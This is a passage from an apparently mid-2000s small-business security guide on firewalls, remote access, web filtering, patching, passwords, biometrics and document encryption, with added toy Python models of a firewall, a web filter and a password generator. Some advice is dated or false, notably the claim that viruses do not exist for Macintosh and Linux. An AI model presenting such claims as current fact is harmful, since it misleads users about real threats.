of the encryption (see the section called “Disappearing Boundaries”) [TewsEtAl-2007, PciSsc-2006
§ 4.1.1].

As mentioned above, some networks may be much simpler than this, especially for SOHO workers,
telecommuters, or satellite offices. Figure 2, “SOHO Network Layout” shows a different setup, much
closer to what my own home office looks like.

Figure 2. SOHO Network Layout

Internet, Internet Clients, and Internet Servers have not changed from the previous
example. The changes are explained below.

SOHO Network Components


Wireless Access Point. A combined wireless access point, firewall, and print server, such as the
Apple Airport Base Station, or any number of products from Linksys™, D-Link™, etc. Many of
these have one or more wired network ports as well as the wireless capability. Shown here, the printer
would be connected to a USB port on the access point, the main PC and Internet service by network
cables. Remember to change the default administration password as soon as you get your device.
Hosting Provider. In this example, there is no DMZ, and no services are provided by the local
network. Instead, there is a web hosting provider who provides email, domain registration, and a web
site. In all likelihood, there are many businesses with web sites and email all running on the same
remote server (“shared hosting” as opposed to “dedicated hosting” which is more reliable and secure
but much more expensive). The web site may be an e-commerce site or it may just be informational,
with the business doing its sales directly, through eBay, an online contract brokerage, or some other
venue. This network may also have a dial-in or VPN connection to a larger corporate network, or
perhaps several for an independent contractor.
Office PC. This is the main PC of the office. It is the newest and fastest computer and has a good
deal of storage. Files are shared to the network, and a CD/DVD burner is used for backups.
Wireless PC. One or more PCs, some of them may be laptops, connect to the network wirelessly.
Wireless technology is becoming a popular choice in homes and especially rented space where it
avoids unsightly cables or punching through drywall to connect computers. Maybe you have an older
PC in a back room. Maybe your spouse does the books on the bedroom PC. Perhaps you sit at the
kitchen table and work with your laptop. The wireless computers use the shared storage from the main PC
and the printer shared from the wireless access point.

One problem we are all guilty of in home office situations is that one or more machines may be used for
both home and business purposes. You or your family members may play games, store music and photos,
watch movies, do school work, or just keep up with email on the same computer. This type of mixing
endangers business data; you are likely to visit more sites, come into contact with more programs, and
have lowered defences when working with personal things and a security problem can compromise your
business too. Sometimes, we do not have enough spare cash or space to separate everything out properly.
There are, however, some things that can make it safer.

If you do not have space for another real computer, get a virtual one. Products like VMWare™13 or
Virtual PC™14 let you run another copy of your OS on top of your real computer, like a computer in a
window. This can let you separate one world from another and keep security problems on one side from
endangering everything else. Failing that, create separate accounts (user names) for everyone who uses
the computer and, preferably, a separate account for business work. This makes it harder, for instance, for
a security problem in your web browser, picked up while checking out the latest NBA stats, to scoop up your
latest sales report. Lastly, encrypt your business data. I will talk about this in the section called “Protecting
Documents”.

A shared hosting site can be a security risk. Because your hosting provider uses the same server to handle
more than one client's email and web site (often several hundred on one computer), a security problem
with one client can spill over and affect others. It also means that a simple hard drive failure will take
hundreds of sites down at one go. Do not store confidential data on your web host longer than you need to
and back your web site up frequently. Encrypting confidential email is probably a good bet as well. Take
care when accessing your web host: always make sure that SSL encryption is working in your browser
and if you use FTP to move files back and forth, ask your service provider how to use a secure connection
like SSH (PuTTY15 is a common Windows program). (20070429 emv) FIXME: Put reference here to later
discussion on change control.

The Network Perimeter


The Front Gate - Firewalls and Routers
The firewall is your first line of defense. It is set up to only allow certain traffic in or out. In most office
environments, no one in the outside world should be allowed to contact your desktop machines (a "deny-all"
firewall). Any attempts to connect to them are turned away. Business systems that have to interact
with the outside world like a web or mail server (assuming you host your own) need special rules and
are placed in a special area called a DMZ. The DMZ is a dangerous space in-between your network and
the hostile outside world.

Your desktop machines are allowed to contact outside services, such as websites or email, but they must
also get information back. When you open a web page, your browser sends a request to the web site.
This establishes a connection between your computer and the web server. When your firewall receives the
request from your computer, it passes it on to the web server, but first, it writes it down in a table. The
web server receives the request, looks up the correct page and sends back a response. When the response
comes back, the firewall checks to see if there is a valid connection between your computer and the web
site. Only data which was actually requested is allowed to come back through. Once the request comes
back, the connection is broken16.

Firewalls are often configured to let any connection out and all requested data back in. There are many
reasons, however, to restrict outgoing traffic to just what your employees really need to do their work.
13 http://www.vmware.com/
14 http://www.microsoft.com/windows/virtualpc/
15 http://www.chiark.greenend.org.uk/~sgtatham/putty/
16 This is called “stateful packet inspection” and, although this is the way that firewalls should be set up, consumer hardware may not be capable of it or may need custom settings to do it properly.

Network services like web and email are associated with numbered ports. Ports are just what they sound
like: a hole in a particular spot to let things pass in and out. Every time data goes through your firewall in
either direction, you poke a small hole through your defenses, like opening the gate in a castle. It is always
possible that the soldier coming in could be an intruder in a stolen uniform or that the person going out is an
escaped prisoner. Some services, particularly those using a protocol called UDP, make it particularly hard
to sort out what incoming data was really requested and what was not. By limiting the number of openings,
telling the firewall which ports can be opened and which are nailed shut, you limit your exposure.

Another reason to limit outgoing data is a component of a defense in depth. Once an intruder gets into
your network, they will need to get data back out unnoticed. Malware will often try to send bulk mail.
By limiting your employees to sending email through your own mail system, you stop these programs
from functioning. The remote control software which makes zombies work uses something called Internet
Relay Chat (IRC). Denying the use of IRC prevents zombies from phoning home. By limiting an attacker's
options you make their jobs harder and their failed attempts may be noticed.
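As an added illustration of how the connection table and the outgoing restrictions described above work together, here is a small Python model written for this primer; it is not code from any real firewall product. It assumes made-up addresses, that web traffic (ports 80 and 443) may go out to anywhere, that mail (port 25) may go out only to the company's own mail server, and that everything else, including IRC on port 6667, is refused. Inbound traffic is admitted only when it answers a request the firewall has already written down.

```python
"""Toy stateful firewall with an outbound ("egress") policy.

Constructed example: the firewall records each permitted outbound request in a
connection table and admits an inbound packet only if it matches a recorded
connection (deny-all otherwise). Outbound traffic is limited to what employees
need: web to anywhere, mail only via the company's own mail relay. All addresses
and port numbers below are made up for illustration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str      # source address
    sport: int    # source port
    dst: str      # destination address
    dport: int    # destination port


OFFICE_MAIL_SERVER = "192.0.2.25"   # constructed: the company's own mail relay


class StatefulFirewall:
    def __init__(self):
        # Connection table entries: (inside host, inside port, outside host, outside port)
        self.table = set()
        self.log = []   # denied packets, for later review

    def _egress_allowed(self, pkt):
        """Outbound policy: web anywhere; SMTP only to our own mail server.
        Anything else (e.g. IRC on 6667, used by zombies to phone home) is denied."""
        if pkt.dport in (80, 443):
            return True
        if pkt.dport == 25 and pkt.dst == OFFICE_MAIL_SERVER:
            return True
        return False

    def outbound(self, pkt):
        """Pass an outbound request on and write it down, or deny it outright."""
        if not self._egress_allowed(pkt):
            self.log.append(f"DENY out {pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport}")
            return False
        self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
        return True

    def inbound(self, pkt):
        """Admit inbound data only as the reply to a recorded request."""
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)   # the request ran the other way
        if key in self.table:
            return True
        self.log.append(f"DENY in {pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport}")
        return False

    def close(self, pkt):
        """Once the request is complete, the connection is forgotten."""
        self.table.discard((pkt.src, pkt.sport, pkt.dst, pkt.dport))


def demo():
    """Run a handful of constructed packets through the policy; returns (results, log)."""
    fw = StatefulFirewall()
    desktop, web = "10.0.0.5", "198.51.100.10"
    req = Packet(desktop, 50000, web, 80)
    reply = Packet(web, 80, desktop, 50000)
    results = {
        "web_request": fw.outbound(req),                                   # allowed, recorded
        "web_reply": fw.inbound(reply),                                    # allowed: matches the table
        "unsolicited": fw.inbound(Packet("203.0.113.7", 4444, desktop, 445)),  # denied: nobody asked
        "irc_out": fw.outbound(Packet(desktop, 50001, "203.0.113.9", 6667)),   # denied: IRC
        "direct_smtp": fw.outbound(Packet(desktop, 50002, "198.51.100.30", 25)),  # denied: not our relay
        "own_mail": fw.outbound(Packet(desktop, 50003, OFFICE_MAIL_SERVER, 25)),  # allowed
    }
    fw.close(req)
    results["reply_after_close"] = fw.inbound(reply)   # denied: connection already gone
    return results, fw.log


if __name__ == "__main__":
    for name, ok in demo()[0].items():
        print(f"{name:18s} {'allowed' if ok else 'denied'}")
```

The denied entries in the log are the point of the egress rules: a program trying to send mail directly or to reach an IRC server is not only stopped, it leaves a trace that someone can notice.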

A balance must be struck between protecting your network and allowing your employees to use convenient
tools. I have often used tools to send email to my pager to notify me of problems or tell me when long
jobs completed. Blocking outgoing email (without providing an alternative) would have interfered with
my (atypical) duties. Finding the correct balance is often a process of trial and error.

The Back Door - Employees On the Go


The firewall works great when employees work at the office behind its protection. It can be a severe
nuisance when an employee is working at home or on travel and needs to access email and business files. A
number of solutions exist for allowing employees access to the inside of the network from another location,
including dial-up, Virtual Private Network (VPN), and products like GoToMyPC™. These technologies
have varying levels of protection, some of which can be quite good, but they all open holes in your network
which might be exploited by bad guys and they all let an unprotected and possibly infected computer
connect to the inside of your network. Sometimes this kind of connection cannot be avoided, such as
when an employee needs remote access to a mainframe, factory automation system, system administration,
or custom network services that cannot be done any other way. Remote access should never be granted
without some thought, however, and other means to access documents and email should be considered
as well.

Instead of letting employees in, it is also possible to move the data out: to a server in your DMZ, or further,
to a vendor's server. Email is easily solved with webmail systems or with a technology called IMAP,
which, unlike traditional POP accounts, leaves all email, including user-created folders, on the server to
be accessed from anywhere. Remote email can and should be secured using SSL, the same technology
which protects online shopping sites; otherwise, it is trivial for others to snoop. Documents can be stored
using Content Management Systems (CMS) which allow employees to upload, download, edit, and share
documents. A new service called Google Apps™17 even provides web-based office tools so that remote
employees do not need office applications.

Of course, nothing comes without trade-offs. By moving data out, you remove the protection of your
firewall and expose it to attack. If you use a vendor's service to store documents, you are completely
dependent on them for security, backup, and so forth. A reputable vendor with a good track record,
however, may have the resources and expertise to do a better job at security than you can. Make certain
you can get your documents back and move them to another vendor if you need to.

Another advantage to moving shared data out is that you can separate your data into sensitive and non-
sensitive. Most of your day to day business documents would probably do you less harm if lost or stolen.
Many real-estate companies these days publish their current listings on the web, so there is hardly a reason
to protect the databases sent to agents in the field. Some documents, on the other hand, would be hard
to replace and would be of great interest to others. Perhaps they contain proposals, business plans, legal
advice, research data, etc. Perhaps you handle confidential data such as medical information or trade secrets
for someone else. Whatever it is, your sensitive documents deserve an extra level of protection. You can
achieve this by moving your non-sensitive data to an outside accessible system and leaving your sensitive
data inside the firewall. If, for some reason, someone needs a copy of an important document, you can
make it accessible just once, then remove it immediately.

17 http://www.google.com/a/

Tip
All your security is worthless if you let the data walk out the door.

Which leads me to another point about employees working from home: If you handle sensitive data for
someone else, don't let them do it. Period. The news is full of stories (e.g. [Lazarus-2006]) of laptops or CDs
being stolen from work-at-home employees with thousands or even hundreds of thousands of confidential
records. This is in the news now, but it is not a new problem. If you must transfer confidential data, encrypt
it. There are a number of tools for protecting data on stolen computers or for encrypting portable drives,
but they are not perfect, so it is best that they not be stolen.

Controlling Web Sites


Another decision often made at the Firewall level is whether to block particular web sites. This is often
done to enforce company policies on inappropriate use of the Internet such as preventing employees from
viewing or searching for obscene pictures. Another purpose can be to block sites which have been listed
as illegitimate or dangerous in online databases. Blocking inappropriate web use can sometimes have a
dramatic effect on reducing network bandwidth use.

Data archiving policies may also lead you to blocking external email services like Hotmail and Gmail
in order to prevent employees from using personal email for business communications. If an employee
discusses a financial transaction or a personnel problem using a personal email service, for instance, you
may not be able to provide that email in response to a subpoena. In addition, use of personal email for a
business communication can bypass any security measures you have in place to protect business email.

Personal email use at work has both advantages and disadvantages; while being a potential distraction, it
may be less of a distraction to others than use of an office phone for personal business. Additionally, forcing
employees to always use official email may create confusion as to when an employee is communicating
officially and when they are not; an employee would not use company letterhead to send a letter to their
child's school, and they should not use a company email address for that purpose either. In many cases, I
have seen companies deal with this by having the employee place a clear disclaimer in an email that they
are speaking in a personal capacity. In the end, which approach you take may not matter as much as having
a clear policy which is consistently enforced. The recent argument over emails in the Department of Justice
attorney firing scandal indicates that White House policy on email use is neither clear nor consistent and
it has gotten them in trouble regardless of underlying issues [Rasch-2007].

Web site blocking can stop casual viewers but has limitations. New sites are added all the time, so no
blocking list can ever be complete. Innocent sites often end up in blocking lists by mistake. Certain users
often have particular needs to access specific blocked sites; your HR employees and your nursing staff are
probably looking for very different things when they search for "breast". There are several web services
which help users bypass web blockers, which must themselves be blocked. It must be understood that
maintaining the block list will be an ongoing task, but the mere attempt may be enough to establish a
consistent policy for purposes of disciplining employees who deliberately violate it.
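To make the trade-offs in the last three paragraphs concrete, here is a small Python model of the decision a web filter makes. It is an added example written for this primer, not the logic of any real filtering product. The host names and groups are made up; it assumes a blocklist matched by domain suffix, a separate reason code for the "bypass" services mentioned above, and per-group exceptions so that, say, nursing staff can reach a medical site that the general list blocks. It also shows the main limitation: a site nobody has listed yet is simply allowed.

```python
"""Toy web-filter decision logic with per-group exceptions.

Constructed example: hostnames are matched against a blocklist by domain suffix
(so any subdomain of a listed domain is caught), each entry carries the reason
it was listed, and a group may be granted exceptions that take precedence.
All hostnames and group names are made up.
"""

# Blocked domains and why they were listed.
BLOCKED_SUFFIXES = {
    "example-gambling.test": "policy",       # inappropriate use
    "known-malware.test": "dangerous",       # listed by an online reputation database
    "webproxy-bypass.test": "bypass",        # service that helps users evade the blocker
    "personal-webmail.test": "archiving",    # personal email blocked for record-keeping
    "example-medical.test": "policy",        # caught by a keyword rule; legitimate for some staff
}

# Groups with a particular need to reach otherwise-blocked sites.
GROUP_EXCEPTIONS = {
    "nursing": {"example-medical.test"},
}


def _parent_domains(host):
    """Yield the host and each parent domain (but not the bare top-level domain),
    so that www.a.example.test is checked as a.example.test and example.test too."""
    parts = host.lower().rstrip(".").split(".")
    for i in range(len(parts) - 1):
        yield ".".join(parts[i:])


def decide(host, group="staff"):
    """Return (allowed, reason) for a request to `host` by a user in `group`.

    Exceptions are checked first so a documented need overrides the general
    list. Anything not listed is allowed, which is why the list can never be
    complete: new sites appear faster than anyone can catalogue them."""
    exceptions = GROUP_EXCEPTIONS.get(group, set())
    for domain in _parent_domains(host):
        if domain in exceptions:
            return True, f"exception for group {group}"
    for domain in _parent_domains(host):
        if domain in BLOCKED_SUFFIXES:
            return False, BLOCKED_SUFFIXES[domain]
    return True, "not listed"


if __name__ == "__main__":
    for host, group in [("www.example-gambling.test", "staff"),
                        ("example-medical.test", "nursing"),
                        ("example-medical.test", "hr"),
                        ("brand-new-site.test", "staff")]:
        print(host, group, decide(host, group))
```

The reason codes matter for maintenance: when an innocent site turns up in the list by mistake, knowing whether it came from policy, a reputation feed, or a bypass list tells you who should review it.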

No Trespassing
Just like "No Trespassing" or "Authorized Personnel Only" signs in and around your business property,
public and private computer resources should also be identified. Prominent warnings should be placed
on private computing resources, such as internal web sites and computer login screens. Confidential or
restricted access materials should be clearly identified. These warnings should refer to company policies
on appropriate computer use and are also great places to put important announcements. By making these
notices prominent, the ignorance defense becomes untenable.

Disappearing Boundaries
Due to the increasing interconnectedness of our online business dealings, the boundaries of the corporate
network are nowhere near as clear as they used to be. Telecommuters connecting from home or the road,
wireless access, contractor laptops, PDAs, offsite service-personnel, and so forth, mean that a business
network may have almost as many doors as walls. Any of these doors can be a potential entry point for an
intruder or an infection, or a potential way for confidential documents to leave.

A hostile computer on a local network can do much damage. First of all, they can snoop on any unencrypted
communications, even capturing passwords to network services. Secondly, they can play a very old trick
called a man-in-the-middle attack by pretending to be a trusted server and stealing confidential data even
from encrypted connections. This is related to phishing and is a technique commonly used by phishers
when users are expecting to connect to secure sites. Most people are familiar with the idea of providing a
username and password to identify themselves to a service, such as a website or email provider. Prior to
the recent phishing scams, few people had given thought to making sure the service provider is who they
claim to be. We will see more applications supporting this kind of validation and making failures more
obvious to users as time goes on, but users must also learn to be suspicious about who they are giving
their information to.

As these changes occur, there are different opinions on how to best adjust the network and keep it safe.
In the end, much of it will depend on the needs of the business. Some of the solutions entail moving non-
sensitive data out of the firewall (discussed in the section called “The Back Door - Employees On the
Go”), moving untrusted connections (e.g. wireless) and computers (contractors) out of the firewall or to a
special part of the network, and beefing up the defenses of all the individual PCs and servers (trust-nothing
systems). This problem and its solutions are well discussed in the Information Security Forum's Report,
The Disappearance of the Network Boundary ([Isf-2005b]).

In essence, by moving wireless connections or untrusted computers outside the firewall or to a special
restricted zone inside the network, you can limit these PCs to accessing specific services and specific,
more secure, applications. As an example, you can force laptops using outdated wireless cards and faulty
encryption (WEP) to use only services which use their own encryption by simply denying them access to
anything else. Contractors can be allowed to connect to only those services which allow them to perform
their specific tasks, browse allowed websites, check their email and nothing more. Viruses they may carry
in stay on their own PCs.

Setups like this can be created using an additional hardware firewall used to connect your untrusted network
to your main business systems. Newer firewall equipment can create multiple network zones with different
restrictions and the same effect can be had with a UNIX/Linux/BSD system, multiple network cards, and
customized firewall settings (not for the faint of heart). Eventually, tools to do this will be commonplace.

In all cases, the changes in network boundaries force us to beef up local defenses and more seriously
consider a defense-in-depth, including encryption of all network traffic, even locally.

Employee PCs - The IT Battleground


Installing Programs
Inside the network, there are, of course, employee computers. Depending on what type of business you
have and how big it is, you may also have file servers, network printers, point-of-sale terminals, automated
paint mixers, and what have you. Because there is such an unbelievable variety of networks, we have no
choice but to gloss over much of the detail.

The employee's computer or "workstation" has been a source of contention since the first days of its
existence. The very term, which should perhaps be "employer's computer" typifies the conflict. Employees
always want more; employers are (or should be) trying to rein in abuses and hold on to their tenuous
control.

The problem is that today's personal computers, which are primarily Windows systems, make it very easy
for the user to not only move data around, but also programs which change the way the system works.
These programs have complete control over the computer, and if they contain malware, such as a virus, they
can spread like wildfire. Nowadays, even documents, such as email or spreadsheets, can contain programs
("macros") which can infect a system. Application security settings will block some of these attacks, but
when security gets in the way of what a user wants to do, they will happily disable it. It is common for
programs or websites to instruct users to disable security settings in order to get a feature to work. Because
technology has changed so quickly, most computer users simply have no way of knowing what actions are
safe and what are not. When they are risking their own PC at home, it is one matter. When their actions
can disrupt a corporate network, it is another.

Another issue is with corporate help desks. The more the employee changes the computer, the less they
will be able to get help. The helpdesk support or local IT person simply has no way of understanding
how the system has been changed, what may be causing the problem, and how to undo it. Applications
on Windows very often interfere with each other. At a large company I worked with, it took months of
testing to add an application to their PC desktops, in order to sort out problems with all of their other
required applications.

Besides exposing a PC to malware, employees who install programs can open a company up to licensing
issues and liability. A program you bought one copy of for a special task may spread around the network.
Users may bring in software they use at home and install it on a company PC. Users may download and
install pirated software. A surprise BSA audit can lead to substantial fines.

UNIX™, a traditional business operating system, and PC systems derived from it, like Linux™ and Mac
OS X™, have a decades-old and well tested multi-level security which allows an administrator to set
up the computer and restrict what a user can do with it. Microsoft introduced a similar system with
Windows NT™ and its security has been improving in recent years. In fact, Windows Group Policies,
setting permissions for groups of users on a network and enforcing them on individual PCs, is a powerful
tool in large companies. Even when the same person owns and uses the computer, setting up a separate
administrator and user account limits the amount of damage that a virus can do.

An alternative or addition to locking down systems is the use of virtual machines or imaging software
which can quickly restore the state of the system to some earlier point. When a user makes a change
and the system stops working, the system is reset and the change is wiped out. This can be especially
useful when the employee has a legitimate need for more freedom (such as testing out new software). The
downside is that, if they do not carefully back up their documents, they will be lost on every reset. This
works particularly well in lab settings where users have network home directories; all of their files are
saved elsewhere and the workstations themselves are expendable.

As with many security issues, you must strike a balance between protecting your network and letting
employees customize their tools. Different people work and organize in different ways, and sometimes
using a different tool can make large productivity gains for particular people, especially if they are building
on prior experience. Having a selection of approved options and knowing when to make exceptions can
go a long way.

Security Fixes
It seems that there is a constant stream of security holes and bug fixes which need to be downloaded and
applied. Not installing patches in a timely manner exposes your systems to unwarranted risk and most
systems (Windows™, Linux™, Macintosh™, etc) have automated systems for downloading new updates.
Many serious virus outbreaks attack systems which should have been patched.

On the other hand, new patches sometimes break things, especially if you have a complicated software
setup. Large companies generally solve this problem by having a test machine which is updated first. If
the test machine works, the rest of the PCs can be updated. Regular backups make it easier to undo a bad
update as well.

A very common but largely unreported problem with small business and home users is how to safely set
up a new PC. I recently helped to set up a new machine which came with Windows XP Service Pack 2
(released in 2004). There have been hundreds of security patches for Windows XP since that time. A new
PC connected to the Internet without those updates can be broken into within minutes, much less time
than it takes to download all of the new software required to protect it. Microsoft provides tools for large
companies to centrally manage updates without connecting to the Internet, but small businesses are out of
luck. Apple allows you to download all of their latest patches on one computer, put them on a disk and
move them to the new computer without connecting the new computer to the network. With Windows, I
had to use an obscure third-party tool18 to accomplish this.

Virus and Spyware Detection


For Windows PCs, anti-virus and spyware protection programs are simply required. They are primarily
designed to find malicious programs once they are on your system, but some also catch incoming viruses
in emails and downloads before they can do damage. Once a virus is on your computer, these tools provide
options to try to remove it. Unfortunately, the only completely safe method of removing an infection
is to reinstall the system and it is a good idea to keep good backups of your documents.

For non-Windows systems, like Macintosh and Linux, viruses do not exist and spyware is rare. This is
partly due to lower market share making them less valuable targets and partly due to security conscious
design making them more difficult targets, but there is no reason why malware may not become a problem
in the future. I run anti-virus software on my Macintosh computer primarily to keep from sending viruses
to Windows users by accident.

Malware detectors are useless without constant updates. They can only detect problem programs once a
security researcher detects them "in the wild" and adds them to a list. There are a number of products out
there, a couple of which are completely free and of good quality.

Software Firewalls
Controlling the changes a user can make to the computer is one way of limiting the spread of infections or
security violations. Another is to try to prevent infections from getting off the computer. Individual PCs
can run their own firewall called a software firewall. Like a hardware firewall, a software firewall limits
what traffic can get in and out and adds an additional layer of protection. Software firewalls slow down the
spread of viruses inside your network, make it harder for attackers who have compromised one computer
to attack another, and make it more difficult for spyware to phone home. If a PC is badly compromised,
an attacker will simply turn the firewall off, so the protection is not absolute.

Windows PCs since XP™ Service Pack 2, Macintosh computers with OS X, and any recent Linux or UNIX
systems all come with software firewalls. There are commercial packages for Windows XP which replace
the substandard built-in firewall. Businesses with Macintosh systems will likely want to spend some effort
customizing its firewall, which is very powerful but not well set up out of the box.

Passwords, Biometrics, and Keychains


Password management has always been a difficult problem for non-technical users and even for many
technical users. A good password is difficult to guess and easy to remember. These do not go well together.
Computer users should not use the same passwords for different purposes, should change them frequently,
and should not have a new password be based on an old password (e.g. oldpassword2). Oh, and
passwords should not be written down. If an employee actually tries to follow this advice, they will quickly
have a dozen or more cryptic passwords for different accounts and, unless they have a photographic
memory, will be calling their local IT person to have a password reset on a daily basis.

18 http://www.autopatcher.com/

Memorable Passwords

One simple technique for creating easy to remember yet difficult to guess passwords is one I have
used for years. Take a quote or phrase:

When the wind is southerly I know a hawk from a handsaw.

—William Shakespeare

Take its initials, including proper capitalization and punctuation: WtwisIkahfah. It looks like
gobbledygook, would never be cracked by an automated password guesser (dictionary attack), and
is still memorable. After a few times, typing it becomes automatic.

Playing with numbers and punctuation a little makes the technique even better: “To be or not to
be, that is the question.” could become: 2bon2btit? Use a phrase you will remember, but not
one that someone would obviously associate with you, like a motto or favorite saying. If chosen
well, you can even provide a reminder hint in programs which allow it so you can remember what
quote you chose. For instance, "mad" might be a good reminder for the first quote if you know
Shakespeare (the preceding line is “I am mad but north north-west.”)
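The sidebar's recipe is mechanical enough to write down as a short program, so here is one, added for this primer rather than taken from the author. It takes the first character of each word, keeping capitalization, and optionally swaps whole words for something else; the substitution table ("to" becomes "2", "question" becomes "?") is my reading of the sidebar's second example, and the tiny word list used by the check at the end is constructed, standing in for the much larger lists a dictionary attack would use.

```python
"""Turn a memorable phrase into an initialism-style password.

Added example. initialism() keeps the first character of every word, with its
original capitalization, and lets a small substitution table replace whole
words (e.g. "to" -> "2"). resists_dictionary() is a constructed sanity check:
a password that contains a plain word from the list would fall to a word-list
guesser much sooner than one that does not.
"""
import string

# Punctuation to ignore when deciding what a "word" is; includes curly quotes.
PUNCT = string.punctuation + "\u201c\u201d\u2018\u2019"


def initialism(phrase, substitutions=None):
    """Return the initials of `phrase`, applying `substitutions` to whole words.

    Words are compared to the substitution table without punctuation and
    case-insensitively, so "to" and "To" both map to "2"."""
    substitutions = substitutions or {}
    out = []
    for token in phrase.split():
        bare = token.strip(PUNCT).lower()
        if not bare:
            continue                      # a lone dash or quote mark contributes nothing
        if bare in substitutions:
            out.append(substitutions[bare])
        else:
            out.append(token.lstrip(PUNCT)[0])   # first character, capitalization kept
    return "".join(out)


# Constructed stand-in for a word list; real attack lists hold millions of entries.
COMMON_WORDS = {"password", "secret", "hawk", "question", "letmein", "shakespeare"}


def resists_dictionary(candidate, words=COMMON_WORDS):
    """True if no listed word appears inside `candidate` (case-insensitive)."""
    lowered = candidate.lower()
    return not any(word in lowered for word in words)


if __name__ == "__main__":
    first = initialism("When the wind is southerly I know a hawk from a handsaw.")
    second = initialism("To be or not to be, that is the question.",
                        {"to": "2", "question": "?"})
    print(first, resists_dictionary(first))
    print(second, resists_dictionary(second))
```

Note what the check does not measure: an initialism built from a quote printed next to your desk, or from a motto everyone associates with you, is guessable by a person even if no word list contains it, which is why the sidebar's advice about choosing the phrase matters as much as the transformation.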

What more often happens is that a user has one password they use for everything, and, when forced to
change it, they tack a new number on the end of it. If they need anything more complicated (their software
forces them to have a complex password), they write the password down somewhere near the computer.
This is an unworkable situation. As we discussed in "Guard Your Secrets", a lock is useless if the attacker
can readily obtain or guess the key.

Some people propose biometric security to replace passwords. Biometrics means that the "password" is
based on some unique characteristic of a person, such as a fingerprint, voice print, or a retinal pattern. The
idea is that a biometric is unique, the user cannot forget it, and an attacker cannot easily steal it. It is an
interesting idea, but most current plans are hopelessly optimistic.

The first problem is that a user can in fact lose a biometric or may not have one in the first place. I went
to school with a girl who had no hands and thus, no fingerprints. A significant number of war veterans are
now entering the work force who are missing limbs. ADA rules might expose a business to liability if they
excluded a potential employee from access due to an inability to use the security system.

The second problem is that biometrics are not exact. Taking measurements is a messy business. They
must be taken quickly, the employee is not exactly positioned each time, and the device has to take
into account minor changes such as dirty hands, stress or illness affecting voice, or a dirty lens. The
measurements must have a fair margin of error to ever let anyone in. On the other side, the security
device has to detect and deny reproductions such as voice recordings, photographs of a retina, or a gel
mockup of a finger. Generally what happens is the device denies legitimate employees on an irregular basis
and allows attackers to bypass security. As reproductions get more sophisticated, fooling even devices
designed to detect a heartbeat or capillary action, the problem becomes harder. Fingerprint scanners have
gotten a lot of negative attention from security researchers, being susceptible to ballistics gel mockups,
transparencies, and even food-grade gummy-gel fingers [MythBusters-2006, MatsumotoEtAl-2002] all of
which are inexpensive and not obvious even when the security checkpoint is watched.

The third and most serious problem is that people leave copies of their biometrics everywhere they go and
have no way of changing them once the bad guys get a copy. Bad guys can record voices, lift fingerprints,
pick up traces of DNA, or position cameras to catch retinal or iris patterns. If you lose a credit card, you
can cancel it and get a new account number. How do you change a fingerprint? Biometrics will not solve
the password problem any time soon. One common security rule of thumb is that authentication uses two
things: something you have (or are) and something you know, such as a username and a password, or a
debit card and a PIN. In that sense, perhaps biometrics are best used in place of the user name
rather than the password.

One good solution to the many passwords problem is a keychain or password vault. In one of my
companies, we had a computer lab. We had a number of locks, on server cabinets and media safes, that
several people needed access to. Rather than give everyone copies and try to keep track of them, we bolted
a locking cabinet to the wall, put the required keys inside, and gave each authorized employee a key to
the cabinet. When they needed a specific key, they went to the key safe, signed out the key, and returned
it when done.

The same general idea can be done with software. Web browsers generally allow you to store usernames
and passwords for websites so you do not have to type them in. You must then only remember the password
to your computer account or web browser and the website passwords can be quite cryptic or even random,
such as "g6%0knpoi2", which an attacker will never guess. In theory, passwords for mail, shared folders,
printers, and what have you can be stored in this way. The downside to this approach is that all of the
passwords are in one place, and, if they can be stolen, the attacker has everything. The password storage
used by Microsoft Internet Explorer and Outlook, for instance, can be raided by spyware. The Firefox web
browser stores its own passwords and, if certain options are turned on, is generally safe.

On the Macintosh system, there is a feature called the Keychain which stores usernames, passwords, and
certificates for all applications. The passwords are protected by encryption and are unlocked by a single
password. You can also store secure notes, to safely record account numbers or safe combinations, for
instance. The biggest security features are first, that the keychain can be set to automatically lock itself in
a variety of circumstances, and second, that access to passwords is restricted to the application that created
them. If your Solitaire application starts asking for your email passwords, for instance, the Keychain will
ask you for permission. This stops many types of spyware in its tracks. It looks like Microsoft is slowly
moving in this direction and it may be the shape of things to come.

A last valuable tool is a smartcard or similar device. The employee carries a credit-card or USB-drive-sized
device which is attached to the computer when they log in. They must also generally type a PIN number.
They cannot log in without the device and the device will not work without the PIN. Login is simpler and
thieves must both steal the device and guess the number. Of course, some process has to be in place for
dealing with employees who lose their smartcard, but an old card is easy to cancel and new cards are not
expensive.

Protecting Documents
A PC is an easy target of attack from multiple directions. Spyware infections or remote break-ins can
be used to slurp documents over the network. Employees commonly leave themselves logged in when
they leave their work area, so someone who can physically access the machine can copy files and install
spyware. An attacker might steal the hard drive or the entire computer, especially in the case of an
employee's home office computer or a laptop. I have seen one case where an entire floor of an office
building was cleaned out by thieves with a truck over a weekend. Since renovations had been going on
that week, an extra truck and an extra work crew were simply not noticed. At several companies where I
have contracted, laptops were often stolen in broad daylight by both employees and intruders.

Even without theft, data can be exposed under standard warranty replacement contracts. When a hard drive
fails and is turned in for replacement, it may very well be repaired and resold as a refurbished drive,
complete with your confidential data [Sullivan-2006]. Once the hard drive has failed, it is too late to delete
critical information, and hardware erasure methods will void your warranty. The only way to protect these
documents is to encrypt them before the hardware fails. Hardware which is being sold can be erased before
the sale. Broken hardware past its warranty can be dealt with easily by, for instance, drilling holes through
the hard drive and its platters. This can be a great way to get out frustration.

43
Business Data Security

Tip
Deleted files do not actually go away. They can be retrieved by a knowledgeable computer user.

When deleting confidential files, it is important to realize that nothing is actually erased. All that happens
is that the space taken up by the file is marked as free for reuse. It may be minutes or months before the
space is actually written over by a new document. In the meantime, there are a number of tools which
can be used to recover the deleted data and hackers are familiar with them. Formatting disks works the
same way; the table of contents is cleared but all of the actual data is left as it is. In order to safely destroy
documents, they must be overwritten first and then deleted. A number of tools exist to do this, normally
referred to as secure deletion, and they will overwrite a document multiple times with gibberish to make
it very difficult to recover.

The best way to protect an important document is to encrypt it. Encryption is a complex subject, but, in
short, encrypting a document scrambles it using a code and only someone who knows the code can make
sense of it. Typically, you supply a password when encrypting and use the same password to get your
document back. Different encryption tools have different strengths. Like physical locks, there are tradeoffs
between complexity (how long it takes to encrypt/decrypt your data) and how much effort the attacker has
to go through to break the encryption. Breaking encryption usually involves large amounts of computer
